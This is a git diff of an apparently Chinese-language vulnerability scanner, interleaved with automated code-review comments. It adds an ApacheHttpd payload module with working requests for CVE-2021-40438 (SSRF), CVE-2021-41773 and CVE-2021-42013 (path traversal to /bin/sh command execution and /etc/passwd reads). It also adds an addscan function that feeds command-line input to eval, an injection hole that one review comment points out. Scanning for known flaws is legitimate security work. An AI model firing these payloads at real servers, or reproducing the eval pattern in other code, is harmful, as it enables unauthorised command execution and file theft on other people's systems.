default='auto', help=lang['application_help']['application']) application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln']) - # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令') # * 第三方api, 例如dnslog/ceye api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name']) @@ -50,6 +59,7 @@ def parse(): save = parser.add_option_group(lang['save_help']['title'], lang['save_help']['name']) save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text']) save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json']) + # save.add_option('--output-html', type='string', dest='html_filename', default=None, help='') # * 通用参数 general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py deleted file mode 100644 index 67d4600..0000000 --- a/lib/plugins/Exp.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - 插件: - POC转EXP -''' - -from lib.api.dns import dns -from lib.initial.config import config -from lib.tool.md5 import md5, random_md5 -from lib.tool.logger import logger -from lib.tool.thread import thread -from lib.tool import check -from lib.tool import head -from thirdparty import requests -from time import sleep -import re - -def exp(result): - pass \ No newline at end of file diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 346e528..5ccf14c 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py 
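Review bot: `--auth` and the `user:pass@host:port` form of `--socks5-proxy` put credentials on the command line, where they land in shell history and are visible to other local users via `ps`; the help text should say so, and the tool could fall back to an environment variable or an interactive prompt when the value is omitted. `--log` is documented as 1-6 but nothing in this hunk rejects other values; an explicit range check after parsing (or an optparse `choices` list) would give a clear error instead of whatever the logger does with 0 or 7. parse() continues outside the hunk.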
@@ -159,6 +159,24 @@ def __init__(self): r'Apache Flink Web Dashboard' ] }, + { + 'name': 'httpd', + 'path': '', + 'data': '', + 'fingerprint': [ + r'The requested URL was not found on this server\.', + r'You don\'t have permission to access this resource\.', + r'The server is temporarily unable to service your request due to maintenance downtime or capacity problems\. Please try again later\.', + r'Apache Tomcat/.*', + r'Home', + r'', + r'These icons were originally made for Mosaic for X.*If you\'d like to contribute additions to this set.*http://httpd\.apache\.org/docs-project', + r'Apache2 Debian Default Page: It works.*Apache2 Debian Default Page', + r'Apache2 server after installation on Debian systems.*it means that the Apache HTTP server installed', + r'The configuration layout for an Apache2 web server installation on Debian systems is as follows:', + r'Apache2 package with Debian\. However, check.*existing bug reports' + ] + }, { 'name': 'solr', 'path': '', @@ -188,7 +206,9 @@ def __init__(self): 'path': '', 'data': '', 'fingerprint': [ - r'Apache Tomcat/.*' + r'Apache Tomcat/.*', + r'Home', + r'' ] }, { @@ -364,6 +384,24 @@ def __init__(self): r'
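Review bot: The new `httpd` fingerprint list contains `r'Home'` and an empty pattern `r''`, and the same two are appended to the `tomcat` list in the following hunk; if those are really the patterns (rather than markup this rendering stripped), an empty regex matches every response and `Home` matches most, so `auto` mode will tag nearly every target as httpd and tomcat and fire those payloads everywhere. Tighten them to the specific markup they were meant to match, and drop `r'Apache Tomcat/.*'` from the httpd entry unless labelling a proxied Tomcat as httpd is intended — as written a bare Tomcat gets both labels. Generic error strings such as `The requested URL was not found on this server\.` are weak evidence on their own; consider requiring more than one match before the fingerprint is accepted. The `__init__` holding this list starts and ends outside the hunk.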

Welcome to Jenkins!

' ] }, + { + 'name': 'jetty', + 'path': '', + 'data': '', + 'fingerprint': [ + r'
Powered by Jetty:// .{0,30}
' + ] + }, + { + 'name': 'jupyter', + 'path': '', + 'data': '', + 'fingerprint': [ + r'Jupyter Notebook requires JavaScript', + r"Jupyter Notebook", + r'Currently running Jupyter processes' + ] + }, # { # 'name': 'keycloak', # 'path': '', @@ -389,6 +427,14 @@ def __init__(self): r"'lui': 'sys/ui/js'" ] }, + { + 'name': 'minihttpd', + 'path': '', + 'data': '', + 'fingerprint': [ + r'
mini_httpd/.{0,40}
' + ] + }, { 'name': 'mongoexpress', 'path': '', @@ -400,6 +446,21 @@ def __init__(self): r'

Mongo Express

' ] }, + { + 'name': 'nexus', + 'path': '', + 'data': '', + 'fingerprint': [ + r'Nexus Repository Manager', + r'Sonatype Nexus', + r'', + r'', + r'Nexus Repository Manager', + r'You are using a version of Internet Explorer that is not supported\.
See the ' + ] + }, { 'name': 'nodejs', 'path': '/404', diff --git a/lib/report/output.py b/lib/report/output.py index 561d7e3..d5016b0 100644 --- a/lib/report/output.py +++ b/lib/report/output.py @@ -6,6 +6,7 @@ from lib.tool.timed import nowtime_year from lib.tool.logger import logger from thirdparty import requests +from thirdparty import HackRequests # from lib.plugins.Exp import exp import json import http.client @@ -83,6 +84,8 @@ def output_json(results, filename, lang): for key in result_info.keys(): if type(result_info[key]) == requests.models.Response: result_info[key] = output_res(key, result_info[key], iscolor=False) + elif type(result_info[key]) == HackRequests.response: + result_info[key] = output_Hackres(key, result_info[key], iscolor=False) results_info_list.append(json.dumps(result_info, indent=4) + '\n') results_info_list = set(results_info_list) @@ -127,6 +130,9 @@ def output_vul_info_color(result): elif value_type == requests.models.Response: # * Response输出方式 result_info += output_res(key, value) + elif value_type == HackRequests.response: + result_info += output_Hackres(key, value) # * HackResponse输出方式 + return result_info def output_vul_info(result): @@ -146,6 +152,9 @@ def output_vul_info(result): elif value_type == requests.models.Response: result_info += output_res(key, value, iscolor=False) + elif value_type == HackRequests.response: + result_info += output_Hackres(key, value, iscolor=False) + return result_info def output_str(key, value, iscolor=True): 
@@ -247,4 +256,30 @@ def output_res(key, res, iscolor=True): except: return info_res + return info_res + +def output_Hackres(key, res, iscolor=True): + ''' 接收一个HackRequests结果, 返回一个http数据包 ''' + info_res = '' + + if iscolor: + try: + info_res += color.yellow_ex(key) + ':' + info_res += color.red_ex(' [Request') + info_res += color.black_ex('\n' + res.log.get('request')) + + info_res += color.red_ex(']') + info_res += color.reset('\n ') + except: + return info_res + else: + try: + info_res += key + ':' + info_res += ' [Request' + info_res += '\n' + res.log.get('request').replace('\n', '') + + info_res += ']\n ' + except: + return info_res + return info_res \ No newline at end of file diff --git a/lib/tool/check.py b/lib/tool/check.py index ea658d2..a914319 100644 --- a/lib/tool/check.py +++ b/lib/tool/check.py @@ -34,8 +34,8 @@ def check_connect(url): except requests.ConnectionError: return False except Exception as e: - return False # print(e) + return False def check_res(res, md): ''' 检查poc误报 diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 617dda5..bf12b95 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py 
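Review bot: In `output_Hackres` both branches wrap the string building in a bare `except:` that returns whatever was accumulated so far, so a `res.log` without a `'request'` entry — `res.log.get('request')` yielding `None` and the concatenation raising `TypeError` — produces a silently truncated packet instead of an error; read the value once with `req = res.log.get('request') or ''`, use `req` in both branches, and narrow the handler to `except (AttributeError, TypeError):`. The non-colour branch also strips every newline from the request with `.replace('\n', '')` while the colour branch keeps them, so the JSON report (which calls this with `iscolor=False`, per `@@ -83`) gets the request line and all headers run together on one line; if that is intentional it deserves a comment, otherwise the two branches should treat the packet the same way.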
@@ -48,10 +48,19 @@ def logging_3(self, vul_info, status_code, res): info_3 = self.logging_2(vul_info, status_code) try: - info_3 += color.red_ex(' [' + res.request.method + ' ') - info_3 +=color.black_ex(res.request.url) + color.red_ex(']') - if vul_info['data']: - info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']') + # * HackRequests + if (str(type(res)) == ""): + info_3 += color.red_ex(' [' + res.method + ' ') + info_3 +=color.black_ex(res.url) + color.red_ex(']') + if vul_info['data']: + info_3 += color.red_ex(' [DATA ') + color.black_ex(vul_info['data']) + color.red_ex(']') + return info_3 + # * requests + else: + info_3 += color.red_ex(' [' + res.request.method + ' ') + info_3 +=color.black_ex(res.request.url) + color.red_ex(']') + if vul_info['data']: + info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']') except: return info_3 
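Review bot: The dispatch added in `logging_3` tests `str(type(res)) == ""`, and `logging_4` (`@@ -60,21 +69,32 @@`) and `logging_6` (`@@ -97,11 +117,20 @@`) repeat it; comparing the repr of a type against a string literal is fragile — it breaks on any rename or move of the class, and as the literal is displayed here it can never be true, which would make the HackRequests branch dead code and send every HackRequests response into the requests branch, where `res.request` raises and the bare `except:` returns the partial line. Use `isinstance(res, HackRequests.response)`, as output.py already keys on `HackRequests.response`, importing `HackRequests` into logger.py if it is not already, or duck-type on the attribute the branch actually needs, `if hasattr(res, 'log'):`. The `def` lines of all three methods are outside their hunks.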
@@ -60,21 +69,32 @@ def logging_3(self, vul_info, status_code, res): def logging_4(self, vul_info, status_code, res): ''' 日志4级, (框架名称+状态码+漏洞编号)+请求数据包 ''' info_4 = self.logging_2(vul_info, status_code) + try: - info_4 += color.red_ex(' [Request') - info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str) - info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url)) - - for key, value in res.request.headers.items(): - info_4 += color.black_ex('\n' + key + ': ' + value) - if res.request.body: - if (type(res.request.body) == bytes): - info_4 += color.black_ex('\n\n' + res.request.body.decode()) - else: - info_4 += color.black_ex('\n\n' + res.request.body) - - info_4 += color.red_ex('\n]') - info_4 += color.reset('') + # * HackRequests + if (str(type(res)) == ""): + info_4 += color.red_ex(' [Request') + info_4 += color.black_ex('\n' + res.log.get('request')) + + info_4 += color.red_ex('\n]') + info_4 += color.reset('') + return info_4 + # * requests + else: + info_4 += color.red_ex(' [Request') + info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str) + info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url)) + + for key, value in res.request.headers.items(): + info_4 += color.black_ex('\n' + key + ': ' + value) + if res.request.body: + if (type(res.request.body) == bytes): + info_4 += color.black_ex('\n\n' + res.request.body.decode()) + else: + info_4 += color.black_ex('\n\n' + res.request.body) + + info_4 += color.red_ex('\n]') + info_4 += color.reset('') except: return info_4 return info_4 
@@ -97,11 +117,20 @@ def logging_6(self, vul_info, status_code, res): ''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 ''' res.encoding = 'utf-8' info_6 = self.logging_5(vul_info, status_code, res) + try: - info_6 = info_6[:-1] - info_6 += color.black_ex('\n\n' + res.text) + # * HackRequests + if (str(type(res)) == ""): + info_6 = info_6[:-1] + info_6 += color.black_ex('\n\n' + res.text()) + + info_6 += color.red_ex('\n]') + # * requests + else: + info_6 = info_6[:-1] + info_6 += color.black_ex('\n\n' + res.text) - info_6 += color.red_ex('\n]') + info_6 += color.red_ex('\n]') except: return info_6 return info_6 diff --git a/payloads/ApacheHttpd.py b/payloads/ApacheHttpd.py new file mode 100644 index 0000000..97a33b1 --- /dev/null +++ b/payloads/ApacheHttpd.py 
@@ -0,0 +1,314 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +httpd是Apache超文本传输协议(HTTP)服务器的主程序: https://httpd.apache.org/download.cgi + Apache httpd扫描类: + 1. Apache httpd 2.4.48 mod_proxy SSRF + CVE-2021-40438 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/ + + 2. Apache httpd 2.4.49 路径遍历 + CVE-2021-41773 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/ + Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py + + 3. Apache HTTP Server 2.4.50 路径遍历 + CVE-2021-42013 + Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/ + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from thirdparty import HackRequests +from time import sleep + +class ApacheHttpd(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + self.proxy = config.get('proxy') + + self.app_name = 'ApacheHttpd' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2021_40438_payloads = [ + { + 'path': 
'?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/', + 'data': '' + }, + ] + + self.cve_2021_41773_payloads = [ + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd) + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash', + 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd) + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd) + }, + { + 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh', + 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd) + }, + { + 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': '' + }, + { + 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': '' + }, + ] + + self.cve_2021_42013_payloads = [ + { + 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh', + 'data': 'echo;{}'.format(self.cmd) + }, + { + 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', + 'data': '' + }, + { + 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd', + 'data': '' + } + ] + + def cve_2021_40438_scan(self, url): + ''' httpd的mod_proxy存在服务器端请求伪造(SSRF) + 该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器 + ''' + vul_info = {} + 
vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'SSRF' + vul_info['vul_id'] = 'CVE-2021-40438' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2021_40438_payloads: + path = payload['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + hack = HackRequests.hackRequests() + + res = hack.http( + target, + method='GET', + timeout=self.timeout, + headers=self.headers, + proxy=self.proxy, + location=False + ) + res.method = vul_info['vul_method'] + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('This domain is for use in illustrative examples in documents.' in res.text()) + and ('domain in literature without prior coordination or asking for permission.' 
in res.text()) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def cve_2021_41773_scan(self, url): + ''' 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷, + 攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件 + 在特定情况下, 攻击者可构造恶意请求执行系统命令 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead/RCE' + vul_info['vul_id'] = 'CVE-2021-41773' + # vul_info['vul_method'] = 'GET/POST' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2021_41773_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + if data: + method = 'POST' + else: + method = 'GET' + + req = requests.Request( + method=method, + url=target, + data=data, + headers=self.headers + ).prepare() + + req.url = target + session = requests.session() + + res = session.send( + req, + timeout=self.timeout, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((self.md in check.check_res(res.text, self.md)) + or ('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def cve_2021_42013_scan(self, url): + ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 
'FileRead/RCE' + vul_info['vul_id'] = 'CVE-2021-42013' + # vul_info['vul_method'] = 'GET/POST' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2021_42013_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + if data: + method = 'POST' + else: + method = 'GET' + + hack = HackRequests.hackRequests() + + res = hack.http( + target, + method=method, + data=data, + timeout=self.timeout, + headers=self.headers, + proxy=self.proxy, + location=False + ) + + res.method = method + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((self.md in check.check_res(res.text(), self.md)) + or ('/sbin/nologin' in res.text()) + or ('root:x:0:0:root' in res.text()) + or ('Microsoft Corp' in res.text()) + or ('Microsoft TCP/IP for Windows' in res.text()) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2021_40438_scan, url=url), + thread(target=self.cve_2021_41773_scan, url=url), + thread(target=self.cve_2021_42013_scan, url=url) + ] + +httpd = ApacheHttpd() diff --git a/payloads/Cisco.py b/payloads/Cisco.py index beb3388..1d79419 100644 --- a/payloads/Cisco.py +++ b/payloads/Cisco.py 
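Review bot: `addscan` builds Python source from the `vuln` and `url` arguments and runs it through `eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))`; both values come from the command line (`-v/--vuln` and the target list), so a quote or `#` in either changes the code that gets executed instead of being passed as data, and a mistyped `vuln` surfaces as a NameError from inside eval rather than a clear message. Resolve the method by name instead: `scan = getattr(self, '{}_scan'.format(vuln))` then `return thread(target=scan, url=url)`. Separately, `cve_2021_40438_scan` never sets `vul_info['data']`, while `logging_3` in lib/tool/logger.py reads `vul_info['data']` inside its bare `except:`, so level-3 logging for that check will presumably be cut short unless the key is added (`vul_info['data'] = ''`). The `except requests.ConnectTimeout` / `requests.ConnectionError` handlers around the `HackRequests.hackRequests().http(...)` calls in `cve_2021_40438_scan` and `cve_2021_42013_scan` likely never fire unless HackRequests re-raises requests exceptions, so timeouts there would be reported as 'Error' rather than 'Timeout'.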
@@ -73,7 +73,7 @@ def cve_2020_3580_scan(self, url):
 logger.logging(vul_info, 'Error')
 return None
- if ("alert('3580')" in res.text):
+ if ("onload=alert('3580')" in res.text):
 results = {
 'Target': target,
 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Django.py b/payloads/Django.py
index 08371ed..955003f 100644
--- a/payloads/Django.py
+++ b/payloads/Django.py
@@ -155,7 +155,7 @@ def cve_2017_12794_scan(self, url):
 logger.logging(vul_info, 'Error')
 return None
- if ("prompt('12794')" in check.check_res(res2.text, "prompt('12794')")):
+ if ("